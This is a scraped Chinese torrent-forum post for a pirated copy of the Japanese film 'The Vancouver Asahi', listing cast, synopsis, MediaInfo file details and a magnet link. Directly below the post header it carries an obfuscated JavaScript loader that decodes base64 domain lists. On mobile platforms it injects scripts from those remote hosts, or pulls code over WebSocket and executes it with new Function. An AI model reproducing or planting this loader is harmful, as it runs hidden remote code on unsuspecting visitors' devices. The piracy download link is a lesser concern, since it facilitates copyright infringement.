温哥华的朝日[中文字幕]The.Vancouver.Asahi.2014.1080p.FriDay.WEB-DL.H264.AAC-迅雷下载 4.73GB

版主小s 21天前 1070

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 温哥华的朝日 / The Vancouver Asahi

◎片 名 バンクーバーの朝日

◎年 代 2014

◎产 地 日本

◎类 别 剧情

◎语 言 日语

◎上映日期 2014-12-20(日本)

◎IMDb链接 https://www.imdb.com/title/tt3550344/

◎豆瓣评分 6.7/10 (994人评价)

◎豆瓣链接 https://movie.douban.com/subject/25832727/

◎片 长 132分钟

◎导 演 石井裕也 Y?ya Ishii (id:1314622)

◎编 剧 奥寺佐渡子 Satoko Okudera (id:1275946)

◎演 员 妻夫木聪 Satoshi Tsumabuki (id:1037028)

龟梨和也 Kazuya Kamenashi (id:1032800)

胜地凉 Ryo Katsuji (id:1024141)

上地雄辅 Y?suke Kamiji (id:1275392)

池松壮亮 Sosuke Ikematsu (id:1009895)

佐藤浩市 K?ichi Sat? (id:1037432)

高畑充希 Mitsuki Takahata (id:1330848)

宫崎葵 Aoi Miyazaki (id:1037138)

贯地谷栞 Shihori Kanjiya (id:1037758)

石田惠理 Eri Ishida (id:1042909)

中山裕介 Yusuke Santamaria (id:1033585)

鹤见辰吾 Shingo Tsurumi (id:1017055)

本上真奈美 Manami Honjou (id:1046426)

光石研 Ken Mitsuishi (id:1029037)

田口智朗 Tomorowo Taguchi (id:1037679)

岩松了 Ry? Iwamatsu (id:1275827)

大杉涟 Ren Ohsugi (id:1134227)

◎标 签 日本 / 日本电影 / 妻夫木聪 / 龟梨和也 / 2014 / 日影 / 妻夫木聡 / 宫崎葵

◎简 介

故事发生在20世纪之初,梦想攫得第一桶金的日本人在同乡的鼓动下一个又一个踏上夹板,漂洋过海来到对他们来说十分神秘的加拿大。坚毅的日本人吃苦耐劳,任劳任怨,凭借双手搭建了赖以憩息的小镇,却仍然遭到白人的歧视和耻笑。为了排解生活的苦闷,笠原雷吉(妻夫木聪饰)和永西罗伊(龟梨和也饰)、北本矽(胜地凉饰)、三宅汤姆(上地雄辅饰)、野岛弗兰克(池松壮亮饰)成立了名为“温哥华朝日队”的棒球队,他们利用工作之余训练,并参加全国性的比赛,可在强壮的白人面前只能沦为垫底球队。某次比赛中,笠原通过触击球发现了己方的特长和优势,从而扭转了常败的局面。他们不断取得胜利,甚至得到了白人的尊重与支持,直到战争的阴云布满整个地球上空……

本片根据真实事件改编。

  1. General

  2. Unique ID : 53383681493641047708146847644930930935 (0x282952B4E9E5BAAD1DDC000BA925F8F7)

  3. Complete name : [email protected]DQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 4.73 GiB

  7. Duration : 2 h 12 min

  8. Overall bit rate : 5 100 kb/s

  9. Encoded date : UTC 2021-07-09 04:10:11

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 3 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 3 frames

  20. Format settings, GOP : M=1, N=60

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 2 h 12 min

  23. Bit rate : 4 969 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 30.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.080

  34. Stream size : 4.61 GiB (97%)

  35. Language : Japanese

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : AAC LC

  41. Format/Info : Advanced Audio Codec Low Complexity

  42. Codec ID : A_AAC-2

  43. Duration : 2 h 12 min

  44. Bit rate : 128 kb/s

  45. Channel(s) : 2 channels

  46. Channel layout : L R

  47. Sampling rate : 44.1 kHz

  48. Frame rate : 43.066 FPS (1024 SPF)

  49. Compression mode : Lossy

  50. Stream size : 122 MiB (3%)

  51. Language : Japanese

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : UTF-8

  57. Codec ID : S_TEXT/UTF8

  58. Codec ID/Info : UTF-8 Plain Text

  59. Duration : 2 h 5 min

  60. Bit rate : 23 b/s

  61. Count of elements : 1001

  62. Stream size : 21.8 KiB (0%)

  63. Title : Chinese Simplified

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No


  67. Text #2

  68. ID : 4

  69. Format : UTF-8

  70. Codec ID : S_TEXT/UTF8

  71. Codec ID/Info : UTF-8 Plain Text

  72. Duration : 2 h 5 min

  73. Bit rate : 23 b/s

  74. Count of elements : 1001

  75. Stream size : 21.8 KiB (0%)

  76. Title : Chinese Traditional

  77. Language : Chinese

  78. Default : No

  79. Forced : No


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:24FF84A7C7D15C640934BA51CFA9817909D751FD
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回